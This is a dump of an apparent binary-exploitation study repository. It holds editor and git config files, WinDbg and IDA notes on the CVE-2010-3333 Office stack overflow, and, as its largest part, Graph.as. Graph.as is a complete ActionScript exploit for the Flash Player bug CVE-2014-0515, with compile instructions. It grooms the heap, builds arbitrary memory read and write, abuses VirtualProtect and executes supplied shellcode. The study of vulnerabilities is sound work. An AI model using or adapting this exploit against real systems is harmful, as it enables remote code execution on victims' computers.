├── .gitattributes ├── .gitignore ├── .vimrc ├── Exploit ├── cve-2010-3333 │ ├── MSO.DLL │ ├── study.md │ └── unpatch_fun.c └── cve-2014-0515 │ ├── Graph.as │ └── study.md ├── Kernel ├── Environment │ ├── README.md │ ├── busybox │ │ └── x86-busybox │ │ │ ├── init │ │ │ ├── linuxrc │ │ │ ├── null_dereference.ko │ │ │ └── prod.sh │ ├── initbusybox.sh │ ├── linux_source │ │ └── f1sh │ │ │ ├── .built-in.o.cmd │ │ │ ├── .sys_f1sh.o.cmd │ │ │ ├── Makefile │ │ │ └── sys_f1sh.c │ ├── run.sh │ └── src │ │ ├── Makefile │ │ └── poc.c └── README.md ├── Malware ├── Dll_Hook │ ├── Dll_Hook.sln │ ├── Dll_Hook │ │ ├── Dll_Hook.aps │ │ ├── Dll_Hook.cpp │ │ ├── Dll_Hook.h │ │ ├── Dll_Hook.rc │ │ ├── Dll_Hook.vcxproj │ │ ├── Dll_Hook.vcxproj.filters │ │ ├── Source.def │ │ └── resource.h │ ├── Dll_Hook_app0 │ │ ├── Dll_Hook_app0.vcxproj │ │ ├── Dll_Hook_app0.vcxproj.filters │ │ └── main.cpp │ └── README.md ├── README.md └── wannacry │ └── README.md ├── Pwn ├── README.md ├── docker_env │ ├── Docker.base │ ├── Dockerfile │ └── README.md ├── examples │ ├── README.md │ ├── dl_resolve │ │ ├── README.md │ │ └── lctf_Pwn-100 │ │ │ ├── README.md │ │ │ ├── pwn1003s4de5rf76tg87yhu │ │ │ ├── pwn1003s4de5rf76tg87yhu.i64 │ │ │ ├── reference.py │ │ │ └── solve.py │ ├── heap │ │ ├── house_of_orange │ │ │ ├── README.md │ │ │ ├── houseoforange │ │ │ ├── houseoforange.i64 │ │ │ ├── libc.so.6_375198810bb39e6593a968fcbcf6556789026743 │ │ │ ├── libc.so.i64 │ │ │ └── template.py │ │ └── unlink │ │ │ ├── README.md │ │ │ ├── libc.so.6 │ │ │ ├── libc.so.6.i64 │ │ │ ├── payload.py │ │ │ ├── refer_exp.py │ │ │ ├── shellman │ │ │ ├── shellman.i64 │ │ │ └── unlink.md │ ├── rop_64 │ │ ├── exp4 │ │ ├── level4 │ │ ├── linux_64_rop │ │ ├── linux_64_rop.c │ │ ├── linux_64_sh.c │ │ ├── lv4.py │ │ ├── pattern.py │ │ └── payload │ ├── rop_chain │ │ ├── README.md │ │ ├── rop_test64.py │ │ └── unexploitable │ ├── srop │ │ ├── README.md │ │ ├── sh_exp.py │ │ └── smallest │ └── template.py ├── pwn_pwn.jpg └── socat_pwn.sh 
├── README.md ├── Reverse ├── README.md ├── cumt2016_re3 │ ├── 03.py │ ├── README.md │ ├── reverse03.exe │ └── reverse03.idb └── driver │ ├── README.md │ └── vmmwindbg.png └── pic2ascii.py /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Windows image file caches 2 | Thumbs.db 3 | ehthumbs.db 4 | 5 | # Folder config file 6 | Desktop.ini 7 | 8 | # Recycle Bin used on file shares 9 | $RECYCLE.BIN/ 10 | 11 | # Windows Installer files 12 | *.cab 13 | *.msi 14 | *.msm 15 | *.msp 16 | 17 | # Windows shortcuts 18 | *.lnk 19 | 20 | # ========================= 21 | # Operating System Files 22 | # ========================= 23 | 24 | # OSX 25 | # ========================= 26 | 27 | .DS_Store 28 | .AppleDouble 29 | .LSOverride 30 | 31 | # Thumbnails 32 | ._* 33 | 34 | # Files that might appear in the root of a volume 35 | .DocumentRevisions-V100 36 | .fseventsd 37 | .Spotlight-V100 38 | .TemporaryItems 39 | .Trashes 40 | .VolumeIcon.icns 41 | 42 | # Directories potentially created on remote AFP share 43 | .AppleDB 44 | .AppleDesktop 45 | Network Trash Folder 46 | Temporary Items 47 | .apdisk 48 | -------------------------------------------------------------------------------- /.vimrc: -------------------------------------------------------------------------------- 1 | 2 | set nocompatible " be iMproved, required 3 
| filetype off " required 4 | 5 | " set the runtime path to include Vundle and initialize 6 | set rtp+=~/.vim/bundle/Vundle.vim 7 | call vundle#begin() 8 | " alternatively, pass a path where Vundle should install plugins 9 | "call vundle#begin('~/some/path/here') 10 | 11 | " let Vundle manage Vundle, required 12 | Plugin 'VundleVim/Vundle.vim' 13 | 14 | " The following are examples of different formats supported. 15 | " Keep Plugin commands between vundle#begin/end. 16 | " plugin on GitHub repo 17 | Plugin 'tpope/vim-fugitive' 18 | " plugin from http://vim-scripts.org/vim/scripts.html 19 | " Plugin 'L9' 20 | " Git plugin not hosted on GitHub 21 | Plugin 'git://git.wincent.com/command-t.git' 22 | " git repos on your local machine (i.e. when working on your own plugin) 23 | Plugin 'file:///home/gmarik/path/to/plugin' 24 | " The sparkup vim script is in a subdirectory of this repo called vim. 25 | " Pass the path to set the runtimepath properly. 26 | Plugin 'rstacruz/sparkup', {'rtp': 'vim/'} 27 | " Install L9 and avoid a Naming conflict if you've already installed a 28 | " different version somewhere else. 
29 | " Plugin 'ascenator/L9', {'name': 'newL9'} 30 | 31 | " ================ Mine Plugin ============ 32 | " NERDTree 33 | Bundle 'scrooloose/nerdtree' 34 | " display button information 35 | Plugin 'bling/vim-airline' 36 | " indent lines 37 | Plugin 'Yggdroot/indentLine' 38 | " rainbow parentheses 39 | Plugin 'luochen1990/rainbow' 40 | " icon 41 | Plugin 'ryanoasis/vim-devicons' 42 | 43 | " All of your Plugins must be added before the following line 44 | call vundle#end() " required 45 | filetype plugin indent on " required 46 | " To ignore plugin indent changes, instead use: 47 | "filetype plugin on 48 | " 49 | " Brief help 50 | " :PluginList - lists configured plugins 51 | " :PluginInstall - installs plugins; append `!` to update or just :PluginUpdate 52 | " :PluginSearch foo - searches for foo; append `!` to refresh local cache 53 | " :PluginClean - confirms removal of unused plugins; append `!` to auto-approve removal 54 | " 55 | " see :h vundle for more details or wiki for FAQ 56 | " Put your non-Plugin stuff after this line 57 | " 58 | 59 | " --------------------- plugin 设置 --------------------------- 60 | let g:vim_markdown_folding_disabled = 1 61 | " 在 vim 启动的时候默认开启 NERDTree(autocmd 可以缩写为 au) 62 | autocmd VimEnter * NERDTree 63 | " 设置 NERDTree宽度 64 | let NERDTreeWinSize=25 65 | " 自动关闭tree 66 | autocmd bufenter * if (winnr("$") == 1 && exists("b:NERDTree") && b:NERDTree.isTabTree()) | q | endif 67 | " 是否显示隐藏文件 68 | let NERDTreeShowHidden=1 69 | " 显示Bookmark 70 | "let NERDTreeShowBookmarks=1 71 | " right tree 72 | let NERDTreeWinPos="right" 73 | " indent 74 | let g:indentLine_enabled = 1 75 | let g:indentLine_setColors = 0 76 | let g:indentLine_color_term = 239 77 | let g:indentLine_char = ' ' 78 | " vim-dev icon 79 | set encoding=utf8 80 | let g:airline_powerline_fonts = 1 81 | " rainbow 82 | let g:rainbow_active = 1 "0 if you want to enable it later via :RainbowToggle 83 | 84 | " --------------------- 个人基本设置 --------------------------- 85 | " delete key set 
for brew install vim in mac 86 | set backspace=indent,eol,start 87 | " 设置行标 88 | set number 89 | " 设置空格折叠快捷键 90 | nnoremap za 91 | " 开启语法高亮 92 | syntax on 93 | " 允许指定语法高亮方案替换默认的高亮方案 94 | syntax on 95 | " 自动适应不同语言的缩进 96 | filetype on 97 | filetype plugin on 98 | filetype indent on 99 | " 制表符转换为空格 100 | set expandtab 101 | " 设置编辑时制表符占空格数 102 | set tabstop=4 103 | " 设置格式化时制表符占空格数 104 | set shiftwidth=4 105 | " 突出显示当前行 106 | "set cursorline 107 | " 突出显示当前列 108 | "set cursorcolumn 109 | 110 | 111 | -------------------------------------------------------------------------------- /Exploit/cve-2010-3333/MSO.DLL: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Exploit/cve-2010-3333/MSO.DLL -------------------------------------------------------------------------------- /Exploit/cve-2010-3333/study.md: -------------------------------------------------------------------------------- 1 | # CVE-2010-3333 2 | 3 | 4 | ## windbg 5 | 6 | ``` 7 | This exception may be expected and handled. 8 | eax=0000c8ac ebx=05000000 ecx=00001ab5 edx=00000000 esi=11045de4 edi=00130000 9 | eip=30ed442c esp=0012a200 ebp=0012a238 iopl=0 nv up ei pl nz na pe nc 10 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 11 | *** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll - 12 | mso!Ordinal1246+0x16b0: 13 | 14 | !address edi 查看edi的值 15 | db esp 16 | lmm mso v 查看mso模块详细信息 17 | ``` 18 | eip指向30ed442c 19 | 20 | IDA打开mso.dll之后 21 | ``` 22 | .text:30ED4406 sub_30ED4406 proc near ; DATA XREF: .text:30DA33F4o 23 | .text:30ED4406 24 | .text:30ED4406 arg_0 = dword ptr 4 25 | .text:30ED4406 arg_4 = dword ptr 8 26 | .text:30ED4406 arg_8 = dword ptr 0Ch 27 | .text:30ED4406 28 | .text:30ED4406 push edi 29 | .text:30ED4407 mov edi, [esp+4+arg_4] 30 | .text:30ED440B test edi, edi 31 | .text:30ED440D jz short loc_30ED4436 32 | .text:30ED440F mov eax, [esp+4+arg_0] 33 | .text:30ED4413 mov ecx, [eax+8] 34 | .text:30ED4416 and ecx, 0FFFFh 35 | .text:30ED441C push esi 36 | .text:30ED441D mov esi, ecx 37 | .text:30ED441F imul esi, [esp+8+arg_8] 38 | .text:30ED4424 add esi, [eax+10h] 39 | .text:30ED4427 mov eax, ecx 40 | .text:30ED4429 shr ecx, 2 41 | .text:30ED442C rep movsd //循环存取 导致溢出 42 | .text:30ED442E mov ecx, eax 43 | .text:30ED4430 and ecx, 3 44 | .text:30ED4433 rep movsb 45 | .text:30ED4435 pop esi 46 | ``` 47 | bp 30ed442c
48 | 之后运行,查看栈回溯
49 | ``` 50 | 0:000> kb 打印前三个函数参数的当前调用堆栈 51 | ChildEBP RetAddr Args to Child 52 | WARNING: Stack unwind information not available. Following frames may be wrong. 53 | 0012a238 30f0b56b 0012a3a4 00000000 ffffffff mso!Ordinal1246+0x16b0 当前的call 54 | 0012a268 30f0b4f9 0012a3f0 0012a3a4 00000000 mso!Ordinal1273+0x2581 前一个call 55 | 0012a4b4 30d4d795 00000000 0012a4f4 00000000 mso!Ordinal1273+0x250f 56 | 0012a4dc 30d4d70d 30d4d5a8 01551a48 01551a80 mso!Ordinal5575+0xf9 57 | 0012a4e0 30d4d5a8 01551a48 01551a80 01551930 mso!Ordinal5575+0x71 58 | 0012a4e4 01551a48 01551a80 01551930 30dce40c mso!Ordinal4099+0xf5 59 | 0012a4e8 01551a80 01551930 30dce40c 00000000 0x1551a48 60 | 0012a4ec 01551930 30dce40c 00000000 01551694 0x1551a80 61 | 0012a4f0 30dce40c 00000000 01551694 0012b2a0 0x1551930 62 | 0012a4f4 00000000 01551694 0012b2a0 00000000 mso!Ordinal2940+0x1588c 63 | ``` 64 | ub mso!Ordinal1273+0x2581 查看对应地址指令
65 | ``` 66 | mso!Ordinal1273+0x256d: 67 | 30f0b557 23c1 and eax,ecx 68 | 30f0b559 50 push eax 69 | 30f0b55a 8d47ff lea eax,[edi-1] 70 | 30f0b55d 50 push eax 71 | 30f0b55e 8b4508 mov eax,dword ptr [ebp+8] 72 | 30f0b561 6a00 push 0 73 | 30f0b563 ff750c push dword ptr [ebp+0Ch] 74 | 30f0b566 e857000000 call mso!Ordinal1273+0x25d8 (30f0b5c2) 75 | ``` 76 | 77 | bp 30f0b5c2
78 | 然后单步一直跟
79 | ``` 80 | 0:000> p 81 | eax=0000c8ac ebx=05000000 ecx=0000322b edx=00000000 esi=1104000c edi=0012a228 82 | eip=30ed442c esp=0012a200 ebp=0012a238 iopl=0 nv up ei pl nz na pe nc 83 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 84 | mso!Ordinal1246+0x16b0: 85 | 30ed442c f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 86 | 0:000> db esi 87 | 1104000c 41 61 30 41 61 31 41 61-32 41 61 33 41 61 34 41 Aa0Aa1Aa2Aa3Aa4A 88 | 1104001c 61 35 41 61 36 41 61 37-41 61 38 41 61 39 41 62 a5Aa6Aa7Aa8Aa9Ab 89 | 1104002c 30 41 62 31 41 62 32 41-62 33 41 62 34 41 62 35 0Ab1Ab2Ab3Ab4Ab5 90 | 1104003c 41 62 36 41 62 37 41 62-38 41 62 39 41 63 30 41 Ab6Ab7Ab8Ab9Ac0A 91 | 1104004c 63 31 41 63 32 41 63 33-41 63 34 41 63 35 41 63 c1Ac2Ac3Ac4Ac5Ac 92 | 1104005c 36 41 63 37 41 63 38 41-63 39 41 64 30 41 64 31 6Ac7Ac8Ac9Ad0Ad1 93 | 1104006c 41 64 32 41 64 33 41 64-34 41 64 35 41 64 36 41 Ad2Ad3Ad4Ad5Ad6A 94 | 1104007c 64 37 41 64 38 41 64 39-41 65 30 41 65 31 41 65 d7Ad8Ad9Ae0Ae1Ae 95 | 0:000> ? 
ebp-edi ;用来计算寄存器差值 96 | Evaluate expression: 16 = 00000010 97 | 这个ebp由ida查看可知 保存的是栈的地址 98 | ;ebp一直保存上一个esp 99 | .text:30F0B5C2 push ebp 100 | .text:30F0B5C3 mov ebp, esp 101 | .text:30F0B5C5 sub esp, 14h 102 | .text:30F0B5C8 cmp [ebp+arg_10], 0 103 | ``` 104 | 105 | 106 | -------------------------------------------------------------------------------- /Exploit/cve-2010-3333/unpatch_fun.c: -------------------------------------------------------------------------------- 1 | char __userpurge sub_30F0B5C2(int a1, int a2, int a3, int a4, int a5, int a6) 2 | { 3 | int v6; // ecx@14 4 | int v7; // esi@2 5 | int v8; // eax@2 6 | char result; // al@2 7 | int v10; // eax@4 8 | bool v11; // zf@4 9 | bool v12; // sf@4 10 | unsigned __int8 v13; // of@4 11 | int v14; // [sp+4h] [bp-14h]@5 12 | int v15; // [sp+8h] [bp-10h]@2 13 | int v16; // [sp+Ch] [bp-Ch]@2 14 | int v17; // [sp+10h] [bp-8h]@2 15 | char v18; // [sp+17h] [bp-1h]@4 16 | int v19; // [sp+24h] [bp+Ch]@4 17 | 18 | if ( a6 ) 19 | { 20 | v7 = *(_DWORD *)(sub_30D29EA3(*(_DWORD *)(a1 + 8)) + 100); 21 | v17 = 0; 22 | v8 = *(_DWORD *)v7; 23 | v16 = 83886080; 24 | (*(void (__stdcall **)(int, int *, int))(v8 + 28))(v7, &v15, a3); 25 | result = sub_30F0B7AF(a2, a5 != 0 ? (int)&v17 : 0, a6); 26 | if ( result ) 27 | { 28 | if ( v17 ) 29 | { 30 | (*(void (__stdcall **)(int, signed int))(*(_DWORD *)v17 + 16))(v17, 83886080); 31 | v16 = 100663296; 32 | } 33 | v10 = a3 + 1; 34 | v13 = __OFSUB__(a3 + 1, a4); 35 | v11 = a3 + 1 == a4; 36 | v12 = a3 + 1 - a4 < 0; 37 | v18 = 0; 38 | v19 = a3 + 1; 39 | if ( (unsigned __int8)(v12 ^ v13) | v11 ) 40 | { 41 | while ( 1 ) 42 | { 43 | (*(void (__stdcall **)(int, int *, int))(*(_DWORD *)v7 + 28))(v7, &v15, v10); 44 | v14 = 0; 45 | if ( !(unsigned __int8)sub_30F0B7AF(a2, a5 != 0 ? 
(int)&v14 : 0, a6) ) 46 | break; 47 | if ( v14 ) 48 | { 49 | (*(void (__stdcall **)(int, int))(*(_DWORD *)v14 + 16))(v14, v16); 50 | v16 += 16777216; 51 | if ( !(unsigned __int8)sub_30E842A0(v14) ) 52 | break; 53 | } 54 | ++v19; 55 | if ( v19 > a4 ) 56 | goto LABEL_15; 57 | v10 = v19; 58 | } 59 | } 60 | else 61 | { 62 | LABEL_15: 63 | if ( a5 ) 64 | { 65 | v6 = v17; 66 | v17 = 0; 67 | *(_DWORD *)a5 = v6; 68 | } 69 | v18 = 1; 70 | } 71 | if ( v17 ) 72 | (*(void (__stdcall **)(int))(*(_DWORD *)v17 + 4))(v17); 73 | result = v18; 74 | } 75 | } 76 | else 77 | { 78 | sub_3144D83D(); 79 | result = 0; 80 | } 81 | return result; 82 | } -------------------------------------------------------------------------------- /Exploit/cve-2014-0515/Graph.as: -------------------------------------------------------------------------------- 1 | //compile with AIR SDK 13.0: mxmlc Graph.as -o Graph.swf 2 | package { 3 | import flash.display.Sprite; 4 | import flash.utils.ByteArray; 5 | import flash.display.Shader; 6 | import flash.system.Capabilities; 7 | import flash.net.FileReference; 8 | import flash.utils.Endian; 9 | import __AS3__.vec.Vector; 10 | import __AS3__.vec.*; 11 | import flash.display.LoaderInfo; 12 | 13 | public class Graph extends Sprite { 14 | 15 | static var counter:uint = 0; 16 | 17 | protected var Shad:Class; 18 | var shellcode_byte_array:ByteArray; 19 | var aaab:ByteArray; 20 | var shellcodeObj:Array; 21 | 22 | public function Graph(){ 23 | var tweaked_vector:* = undefined; 24 | var tweaked_vector_address:* = undefined; 25 | var shader:Shader; 26 | var flash_memory_protect:Array; 27 | var code_vectors:Array; 28 | var address_code_vector:uint; 29 | var address_shellcode_byte_array:uint; 30 | this.Shad = Graph_Shad; 31 | super(); 32 | shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(","); 33 | var i:* = 0; 34 | var j:* = 0; 35 | 36 | // Just one try 37 | counter++; 38 | if (counter > 1) 39 | { 40 | return; 41 | }; 42 | 43 | // Memory massage 44 | var 
array_length:uint = 0x10000; 45 | var vector_size:uint = 34; 46 | var array:Array = new Array(); 47 | // 将碎片化内存占满 48 | i = 0; 49 | while (i < array_length) 50 | { 51 | array[i] = new Vector.(1); 52 | i++; 53 | }; 54 | // 申请0x90字节块 55 | i = 0; 56 | while (i < array_length) 57 | { 58 | array[i] = new Vector.(vector_size); 59 | i++; 60 | }; 61 | // 改变长度=0 62 | i = 0; 63 | while (i < array_length) 64 | { 65 | array[i].length = 0; 66 | i++; 67 | }; 68 | /* 69 | * 制造小hole 70 | * 71 | */ 72 | i = 0x0200; 73 | while (i < array_length) 74 | { 75 | array[(i - (2 * (j % 2)))].length = 0x0100; 76 | i = (i + 28); 77 | j++; 78 | }; 79 | 80 | // Overflow and Search for corrupted vector 81 | var corrupted_vector_idx:uint; 82 | var shadba:ByteArray = (new this.Shad() as ByteArray); 83 | shadba.position = 232; 84 | if (Capabilities.os.indexOf("Windows 8") >= 0) 85 | { 86 | shadba.writeUnsignedInt(2472); 87 | }; 88 | shadba.position = 0; 89 | while (1) 90 | { 91 | shader = new Shader(); 92 | try 93 | { 94 | shader.byteCode = (new this.Shad() as ByteArray); 95 | } catch(e) 96 | { 97 | }; 98 | i = 0; 99 | while (i < array_length) 100 | { 101 | if (array[i].length > 0x0100) 102 | { 103 | corrupted_vector_idx = i; 104 | break; 105 | }; 106 | i++; 107 | }; 108 | if (i != array_length) 109 | { 110 | if (array[corrupted_vector_idx][(vector_size + 1)] > 0) break; 111 | }; 112 | array.push(new Vector.(vector_size)); 113 | }; 114 | 115 | // Tweak the vector following the corrupted one 116 | array[corrupted_vector_idx][vector_size] = 0x40000001; 117 | tweaked_vector = array[(corrupted_vector_idx + 1)]; 118 | 119 | // repair the corrupted vector by restoring its 120 | // vector object pointer and length 121 | var vector_obj_addr:* = tweaked_vector[0x3fffffff]; 122 | tweaked_vector[((0x40000000 - vector_size) - 3)] = vector_obj_addr; 123 | tweaked_vector[((0x40000000 - vector_size) - 4)] = vector_size; 124 | i = 0; 125 | var val:uint; 126 | while (true) 127 | { 128 | val = 
tweaked_vector[(0x40000000 - i)]; 129 | if (val == 0x90001B) break; 130 | i++; 131 | }; 132 | tweaked_vector_address = 0; 133 | if (tweaked_vector[((0x40000000 - i) - 4)] > 0) 134 | { 135 | tweaked_vector[4] = 0x41414141; 136 | tweaked_vector_address = ((tweaked_vector[((0x40000000 - i) - 4)] + (8 * (vector_size + 2))) + 8); 137 | }; 138 | 139 | // More memory massage, fill an array of FileReference objects 140 | var file_reference_array:Array = new Array(); 141 | i = 0; 142 | while (i < 64) 143 | { 144 | file_reference_array[i] = new FileReference(); 145 | i++; 146 | }; 147 | 148 | var file_reference_vftable:uint = this.find_file_ref_vtable(tweaked_vector, tweaked_vector_address); 149 | var cancel_address:uint = this.read_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20)); 150 | var do_it:Boolean = true; 151 | var memory_protect_ptr:uint; 152 | var aaaq:uint; 153 | if (do_it) 154 | { 155 | flash_memory_protect = this.findFlashMemoryProtect(tweaked_vector, tweaked_vector_address); 156 | memory_protect_ptr = flash_memory_protect[0]; 157 | aaaq = flash_memory_protect[1]; // Not sure, not used on the Flash 11.7.700.202 analysis, maybe some type of adjustment 158 | code_vectors = this.createCodeVectors(0x45454545, 0x90909090); 159 | address_code_vector = this.findCodeVector(tweaked_vector, tweaked_vector_address, 0x45454545); 160 | this.fillCodeVectors(code_vectors); 161 | tweaked_vector[7] = (memory_protect_ptr + 0); // Flash VirtualProtect call 162 | tweaked_vector[4] = aaaq; 163 | tweaked_vector[0] = 0x1000; // Length 164 | tweaked_vector[1] = (address_code_vector & 0xFFFFF000); // Address 165 | 166 | // 10255e21 ff5014 call dword ptr [eax+14h] ds:0023:41414155=???????? 
167 | this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), (tweaked_vector_address + 8)); 168 | 169 | // 1) Set memory as executable 170 | i = 0; 171 | while (i < 64) 172 | { 173 | file_reference_array[i].cancel(); 174 | i++; 175 | }; 176 | 177 | // 2) Execute shellcode 178 | tweaked_vector[7] = address_code_vector; 179 | i = 0; 180 | while (i < 64) 181 | { 182 | file_reference_array[i].cancel(); 183 | i++; 184 | }; 185 | 186 | // Restore FileReference cancel function pointer 187 | // Even when probably msf module is not going to benefit because of the ExitThread at the end of the payloads 188 | this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), cancel_address); 189 | }; 190 | } 191 | 192 | // returns the integer at memory address 193 | // vector: vector with tweaked length 194 | // vector_address: vector's memory address 195 | // address: memory address to read 196 | function read_memory(vector:Vector., vector_address:uint, address:uint):uint{ 197 | if (address >= vector_address) 198 | { 199 | return (vector[((address - vector_address) / 4)]); 200 | }; 201 | return (vector[(0x40000000 - ((vector_address - address) / 4))]); 202 | } 203 | 204 | function write_memory(vector:Vector., vector_address:uint, address:uint, value:uint){ 205 | if (address >= vector_address) 206 | { 207 | vector[((address - vector_address) / 4)] = value; 208 | } else 209 | { 210 | vector[(0x40000000 - ((vector_address - address) / 4))] = value; 211 | }; 212 | } 213 | 214 | function findFlashMemoryProtect(vector:*, vector_address:*):Array{ 215 | var content:uint; 216 | var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c)); 217 | var index:uint; 218 | var memory_protect_ptr:uint; 219 | var _local_6:uint; 220 | if (allocation >= vector_address) 221 | { 222 | index = ((allocation - vector_address) / 4); 223 | } else 224 | { 225 | index = (0x40000000 - ((vector_address - 
allocation) / 4)); 226 | }; 227 | 228 | //push 1 ; 6a 01 229 | //push dword ptr [eax-8] ; ff 70 f8 230 | //push dword ptr [eax-4] ; ff 70 fc 231 | //call sub_1059DD00 // Will do VirtualProtect 232 | var offset:uint; 233 | while (1) 234 | { 235 | index--; 236 | content = vector[index]; 237 | if (content == 0xfff870ff) 238 | { 239 | offset = 2; 240 | break; 241 | }; 242 | if (content == 0xf870ff01) 243 | { 244 | offset = 1; 245 | break; 246 | }; 247 | if (content == 0x70ff016a) 248 | { 249 | content = vector[(index + 1)]; 250 | if (content == 0xfc70fff8) 251 | { 252 | offset = 0; 253 | break; 254 | }; 255 | } else 256 | { 257 | if (content == 0x70fff870) 258 | { 259 | offset = 3; 260 | break; 261 | }; 262 | }; 263 | }; 264 | 265 | memory_protect_ptr = ((vector_address + (4 * index)) - offset); 266 | index--; 267 | var content_before:uint = vector[index]; 268 | 269 | if (content_before == 0x16a0424) 270 | { 271 | return ([memory_protect_ptr, _local_6]); 272 | }; 273 | if (content_before == 0x6a042444) 274 | { 275 | return ([memory_protect_ptr, _local_6]); 276 | }; 277 | if (content_before == 0x424448b) 278 | { 279 | return ([memory_protect_ptr, _local_6]); 280 | }; 281 | if (content_before == 0xff016a04) 282 | { 283 | return ([memory_protect_ptr, _local_6]); 284 | }; 285 | _local_6 = (memory_protect_ptr - 6); 286 | 287 | while (1) 288 | { 289 | index--; 290 | content = vector[index]; 291 | if (content == 0x850ff50) 292 | { 293 | if (uint(vector[(index + 1)]) == 0x5e0cc483) 294 | { 295 | offset = 0; 296 | break; 297 | }; 298 | }; 299 | content = (content & 0xFFFFFF00); 300 | if (content == 0x50FF5000) 301 | { 302 | if (uint(vector[(index + 1)]) == 0xcc48308) 303 | { 304 | offset = 1; 305 | break; 306 | }; 307 | }; 308 | content = (content & 0xFFFF0000); 309 | if (content == 0xFF500000) 310 | { 311 | if (uint(vector[(index + 1)]) == 0xc4830850) 312 | { 313 | if (uint(vector[(index + 2)]) == 0xc35d5e0c) 314 | { 315 | offset = 2; 316 | break; 317 | }; 318 | }; 319 | }; 
320 | content = (content & 0xFF000000); 321 | if (content == 0x50000000) 322 | { 323 | if (uint(vector[(index + 1)]) == 0x830850ff) 324 | { 325 | if (uint(vector[(index + 2)]) == 0x5d5e0cc4) 326 | { 327 | offset = 3; 328 | break; 329 | }; 330 | }; 331 | }; 332 | }; 333 | memory_protect_ptr = ((vector_address + (4 * index)) + offset); 334 | return ([memory_protect_ptr, _local_6]); 335 | } 336 | 337 | // vector: vector with tweaked length 338 | // address: memory address of vector data 339 | function find_file_ref_vtable(vector:*, address:*):uint{ 340 | var allocation:uint = this.read_memory(vector, address, ((address & 0xFFFFF000) + 0x1c)); 341 | 342 | // Find an allocation of size 0x2a0 343 | var allocation_size:uint; 344 | while (true) 345 | { 346 | allocation_size = this.read_memory(vector, address, (allocation + 8)); 347 | if (allocation_size == 0x2a0) break; 348 | if (allocation_size < 0x2a0) 349 | { 350 | allocation = (allocation + 0x24); // next allocation 351 | } else 352 | { 353 | allocation = (allocation - 0x24); // prior allocation 354 | }; 355 | }; 356 | var allocation_contents:uint = this.read_memory(vector, address, (allocation + 0xc)); 357 | while (true) 358 | { 359 | if (this.read_memory(vector, address, (allocation_contents + 0x180)) == 0xFFFFFFFF) break; 360 | if (this.read_memory(vector, address, (allocation_contents + 0x17c)) == 0xFFFFFFFF) break; 361 | allocation_contents = this.read_memory(vector, address, (allocation_contents + 8)); 362 | }; 363 | return (allocation_contents); 364 | } 365 | 366 | // Returns pointer to the nops in one of the allocated code vectors 367 | function findCodeVector(vector:*, vector_address:*, mark:*):uint{ 368 | var allocation_size:uint; 369 | var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c)); 370 | while (true) 371 | { 372 | allocation_size = this.read_memory(vector, vector_address, (allocation + 8)); 373 | if (allocation_size == 0x7f0) break; // Code Vector 
found 374 | allocation = (allocation + 0x24); // next allocation 375 | }; 376 | 377 | // allocation contents should be the vector code, search for the mark 0x45454545 378 | var allocation_contents:uint = this.read_memory(vector, vector_address, (allocation + 0xc)); 379 | while (true) 380 | { 381 | if (this.read_memory(vector, vector_address, (allocation_contents + 0x28)) == mark) break; 382 | allocation_contents = this.read_memory(vector, vector_address, (allocation_contents + 8)); // next allocation 383 | }; 384 | return ((allocation_contents + 0x2c)); 385 | } 386 | 387 | // create 8 vectors of size 0x7f0 inside an array to place shellcode 388 | function createCodeVectors(mark:uint, nops:uint){ 389 | var code_vectors_array:Array = new Array(); 390 | var i:* = 0; 391 | while (i < 8) 392 | { 393 | code_vectors_array[i] = new Vector.(((0x7f0 / 4) - 8)); // new Vector.(0x1f4) 394 | code_vectors_array[i][0] = mark; // 0x45454545 // inc ebp * 4 395 | code_vectors_array[i][1] = nops; // 0x90909090 // nop * 4 396 | i++; 397 | }; 398 | return (code_vectors_array); 399 | } 400 | 401 | 402 | // Fill with the code vectors with the shellcode 403 | function fillCodeVectors(array_code_vectors:Array) { 404 | var i:uint = 0; 405 | var sh:uint=1; 406 | 407 | while(i < array_code_vectors.length) 408 | { 409 | for(var u:String in shellcodeObj) 410 | { 411 | array_code_vectors[i][sh++] = Number(shellcodeObj[u]); 412 | } 413 | i++; 414 | sh = 1; 415 | } 416 | } 417 | } 418 | }//package -------------------------------------------------------------------------------- /Exploit/cve-2014-0515/study.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Exploit/cve-2014-0515/study.md -------------------------------------------------------------------------------- /Kernel/Environment/README.md: 
